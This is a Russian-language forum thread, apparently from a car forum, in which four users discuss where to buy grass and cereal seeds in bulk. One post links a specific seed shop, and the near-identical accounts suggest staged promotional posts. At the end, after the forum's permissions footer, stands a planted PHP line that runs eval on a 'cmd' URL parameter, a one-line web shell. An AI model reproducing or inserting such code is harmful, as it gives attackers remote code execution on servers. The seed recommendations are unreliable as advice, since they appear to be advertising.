+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Семена трав


  1. #1
    Мимо проходил iljas is on a distinguished road Аватар для iljas
    Регистрация
    23.12.2018
    Откуда
    .
    Машина
    Volkswagen
    Сообщений
    12

    Семена трав

    Ребята, не так давно взял в аренду большой участок земли под свои бизнес идеи. И вот одна из этих идей заключается в том, чтобы выращивать самые различные злаковые культуры, с чего и иметь прибыль. Поэтому в данный момент у меня возникла острая необходимость купить выгодно различные семена трав оптом. Нашел вот сайт, где есть возможность приобрести самые различные злаковые культуры https://moskorma.ru/semena/ . Но пока я только прицениваюсь и не спешу с окончательным выбором. А как Вы считаете, где такой товар можно купить наиболее выгодней?

  2. #2
    Мимо проходил genka is on a distinguished road Аватар для genka
    Регистрация
    21.12.2018
    Откуда
    Россия
    Машина
    Golf
    Сообщений
    11
    Как по мне, то выгодней всего покупать различные семена трав на рынках. Где, как думаю знаете и сами, есть возможность всегда хорошенько поторговаться и сбросить сену.

  3. #3
    Мимо проходил martin is on a distinguished road Аватар для martin
    Регистрация
    22.12.2018
    Откуда
    World
    Машина
    Golf Alltrack
    Сообщений
    11
    А я с вами согласен не полностью, так как считаю, что сейчас самые демократические цены в интернет-магазинах. Где и сам покупаю себе семена трав для фермерского дела.

  4. #4
    Мимо проходил masik is on a distinguished road Аватар для masik
    Регистрация
    28.12.2018
    Откуда
    .
    Машина
    Golf 1
    Сообщений
    11
    Ну не знаю, я вот в последнее время приобретаю семена злаковых культур у одного фермера, которого нашел по частным объявлениям в газетах. Так он мне постоянно делает выгодные скидки, да и качество товара вроде ничего.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}